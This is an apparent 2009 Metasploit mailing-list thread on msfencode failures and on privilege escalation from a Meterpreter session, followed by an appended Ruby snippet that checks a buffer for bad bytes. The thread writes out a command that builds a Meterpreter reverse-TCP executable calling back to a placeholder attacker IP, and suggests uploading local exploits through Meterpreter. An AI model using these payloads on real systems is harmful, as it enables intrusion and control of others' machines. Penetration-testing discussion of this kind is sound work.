Metasploit mailing list archives
Questions...
From: hdm at metasploit.com (HD Moore)
Date: Fri, 26 Jun 2009 08:05:13 -0500
On Fri, 26 Jun 2009 03:08:10 -0500, Karlsson Anders <anders.karlsson at atea.se> wrote:
First, I am having some problems with msfencode. When creating a payload, the exe file does not work (I am not getting any connection back to my computer from the victim) and I can see that the exe file starts and closes/crashes? in Windows Task Manager on the "victim". I am using the command:

./msfpayload windows/meterpreter/reverse_tcp LHOST=(my_attacker_ip) LPORT=80 R | ./msfencode -b ' ' -t exe -o /tmp/reverse.exe

If I create the same payload without using msfencode (old style), the exe file works perfectly! What am I doing wrong with msfencode?
We have made a ton of changes lately, so it wouldn't be surprising if something broke. I just tested the latest revision on WinXP SP3; everything checks out OK there with the reverse payload and the same command line. One known bug right now is that Windows 2000 support is broken in the bind|reverse stagers; this was introduced when Windows 7 support was added and should be fixed very soon. In your command line above, you are specifying 0x20 as your "bad character" for the -b argument. Is this intentional?
Sometimes a victim is not local admin on his machine (when running a payload like the one above, without exploitation). How can I run "local exploits" on that machine from a meterpreter session, like the "Local Privilege Escalation attacks" in Core Impact? I want to be admin, you know....
The quick answer is to write a Meterpreter script that uploads the executable implementing the local exploit and runs it. The Meterpreter API provides most of the functionality you need, and you can even build local priv escalation attacks as Meterpreter extensions.

-HD
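To make the -b point concrete: the following is an added example, not msfencode's own option handling. It assumes a badchars string is read the way the thread treats it (a literal ' ' meaning byte 0x20, and \xHH escapes for non-printable bytes), and it checks a buffer against that set, which is what an operator should do on the encoder's output before shipping it.

```ruby
# Added example (not Metasploit code). Parses an msfencode-style -b string into
# a set of forbidden byte values and scans a buffer for any occurrence of them.

# Turn a spec such as '\x00\x0a' or ' ' into a sorted array of byte values.
# Assumed syntax: \xHH escapes become that byte; any other character
# contributes its own byte (so ' ' is just 0x20, as in the thread).
def parse_badchars(spec)
  bytes = []
  i = 0
  while i < spec.length
    hex = spec[i + 2, 2]
    if spec[i, 2] == '\\x' && hex && hex.match?(/\A\h{2}\z/)
      bytes << hex.to_i(16)
      i += 4
    else
      bytes << spec[i].ord
      i += 1
    end
  end
  bytes.uniq.sort
end

# Return the offsets in buf (binary string) of every byte in the badchars set.
# An empty result means the encoder honoured the -b constraint for this buffer.
def find_badchars(buf, badchars)
  offsets = []
  buf.each_byte.with_index { |b, idx| offsets << idx if badchars.include?(b) }
  offsets
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample buffer, not a real payload: contains a space byte.
  sample = "push esp".b
  bad = parse_badchars(' ')
  puts "badchars from ' ' : #{bad.map { |b| format('0x%02x', b) }.join(' ')}"
  puts "0x20 found at offsets: #{find_badchars(sample, bad).inspect}"
end
```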